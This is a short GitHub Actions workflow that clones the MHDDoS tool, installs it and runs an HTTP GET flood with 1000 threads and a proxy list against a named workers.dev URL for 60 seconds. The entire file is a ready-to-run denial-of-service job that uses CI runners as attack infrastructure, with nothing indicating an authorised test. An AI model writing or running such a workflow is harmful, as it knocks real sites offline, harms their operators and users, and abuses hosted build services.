on: workflow_dispatch
jobs:
  az:
    runs-on: ubuntu-26.04-arm
    steps:
      - run: |
          git clone https://github.com/MatrixTM/MHDDoS.git
          cd MHDDoS
          pip install -r requirements.txt
          python start.py GET https://react-router-starter-template.tosavailable.workers.dev/ 0 1000 p.txt 100 60 true
